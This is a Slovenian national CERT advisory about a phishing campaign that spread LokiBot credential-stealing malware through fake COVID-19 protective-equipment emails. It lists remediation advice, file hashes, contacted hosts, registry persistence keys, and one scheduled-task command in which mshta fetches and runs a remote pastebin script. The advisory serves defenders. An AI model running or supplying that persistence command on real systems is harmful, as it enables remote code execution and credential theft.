Skoči na vsebino

SI-CERT 2020-05 / Lažno sporočilo NIJZ

Dopolnitev obvestila 12.6.2020:

Dne 12.6.2020 smo zaznali drugi val napada po elektronski pošti z podobno vsebino. Priloga sporočila v drugem valu vsebuje priponki “Prijavnica za distribucijo zaščitne opreme covid-19.pot” in “Preventivni ukrepi Covid-19.ppt”. Gre za Powerpoint datoteki, ki vsebujeta zlonamerno makro skripto. Ta na okužen sistem prenese dodatno škodljivo kodo vrste “information stealer” in jo zažene.

V primeru zagona datoteke iz priloge sporočila je potrebno sistem nemudoma izklopiti iz omrežja. Dodatno je potrebno zamenjati vsa gesla, ki so bila shranjena na sistemu, ali so se vpisovala v času okužbe. Svetujemo tudi preklic digitalnih potrdil, katerih zasebni ključi so bili dosegljivi na sistemu, ter novo namestitev sistema oz. ponastavitev na tovarniške nastavitve.

Prvi val širjenja virusa

2.6.2020 okoli 12 ure je bilo na večje število slovenskih elektronskih naslovov poslano sporočilo z zadevo ” Distribucija zaščitne opreme Covid-19 (Ministrstvo za zdravje Slovenija) Junij 2020″. Sporočilo vsebuje zip arhiv “prijavnica za preventivno opremo·pdf.zip”, ki vsebuje datoteko “prijavnica za preventivno opremo·pdf.exe”. Exe datoteka je virus vrste lokibot, ki spada v kategorijo “information stealer” virusov.

Primer lažnega elektronskega sporočila
Primer lažnega elektronskega sporočila

Po zagonu prenese dodatno binarno kodo iz https://drive.google.com in jo izvede. Prvotno izvršljivo datoteko izbriše. Analiza ni pokazala prisotnosti mehanizmov za persistentnost med zagoni sistema. Virus vsebuje funkcionalnost keyloggerja, krade pa tudi shranjene poverilnice (gesla) v različnih programih, med drugimi: Opera, Chromodo, Coowon, Titan Browser, Microsoft Sticky Notes, Mustang Browser, Google Chrome, Notezilla, Epic Privacy Browser, 360 Browser, Citrio, Orbitum, Iridium, TrulyMail, Superbird, Yandex Browser, Xftp, BlazeFTP, Automize, Filezilla, AbleFTP, Gmail Notifier Pro, in drugi.

Drugi val širjenja virusa

Datoteka “Prijavnica za distribucijo zaščitne opreme covid-19.pot” oz. “Preventivni ukrepi Covid-19.ppt” vsebujeta makro, ki iz več spletnih naslovov prenese dodatno škodljivo kodo in jo izvede. Funkcionalnost virusa je podobna tisti iz prvega vala, poleg tega pa kreira tudi ključe v registru, s katerimi doseže persistentnost med zagoni sistema.

IOC (prvi val):

Datoteka prijavnica za preventivno opremo·pdf.exe

MD5a2cee25ff6fe14d72c888e5ad2e834ca
SHA1e3013c6285cfea41e31dbafad4c0f86102b4c310
SHA256e6e85c7dee15e68872a6579cc8af8c01662316db6f6af8132ef178c643d66881

Dodatne prenešene datoteke:

MD5b7fbe7adc7b2de0483ef6244cd953773
SHA14a0bac35ae8e1a42ee3b91dad05c76e8bbc77928
SHA256f584de7e16402712d8a1635874d33eb866c4bccb910e5da89492f2e95dacfedf
MD5e5e83c6e16ceb99d02ed9065796373eb
SHA1ec16a37497b13e173bfc66b2176f72e5bc898355
SHA2562efd6e52f80f48682d9f42a1369a7b9d60a28572626b01e12099cd0c5f411dfc

Omrežne povezave:

http://198.23.200.239
https://drive.google.com

IOC (drugi val)

Datoteka “Preventivni ukrepi Covid-19.ppt” oz. “Prijavnica za distribucijo zaščitne opreme covid-19.pot”

MD5d0ed831ee17e87fe82b1b203cf1c7405
SHA1a745ebeb43469ba013fb014250995a1cc7c898af
SHA256ba5c251f78a1d57b72901f4ff80824d6ad0aa4bf1931c593a36254db4ab41021

Omrežne povezave:

http://j.mp
https://pastebin.com
http://198.23.200.239

Zagonski ključi v registru:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sadSTART
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\sadDEF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\bin

Dodano opravilo:

schtasks /create /sc MINUTE /mo 80 /tn “enhpoxes” /tr “\”mshta\”https://%20%20@pastebin.com\raw\dnwrjtYS” /F

Preberite tudi

SI-CERT 2020-07 / Zlonamerna koda v potvorjenih sporočilih v imenu NLB

Večje število slovenskih uporabnikov je danes prejelo potvorjeno elektronsko sporočilo, v imenu NLB banke. V priponki se nahaja zlonamerna koda LokiBot
Več

SI-CERT 2020-06 / Kritična ranljivost Windows DNS strežnika

Kritična ranljivost Windows DNS strežnika omogoča zagon poljubne kode na daljavo s pravicami uporabnika Local System Account.
Več

SI-CERT 2020-04 / Odpravljene ranljivosti Zoom videokonferenčnega sistema

Zoom je ena od široko uporabljanih videokonferenčnih platform. 1. aprila 2020 so bile odkrite varnostne ranljivosti odjemalcev za Windows in macOS.
Več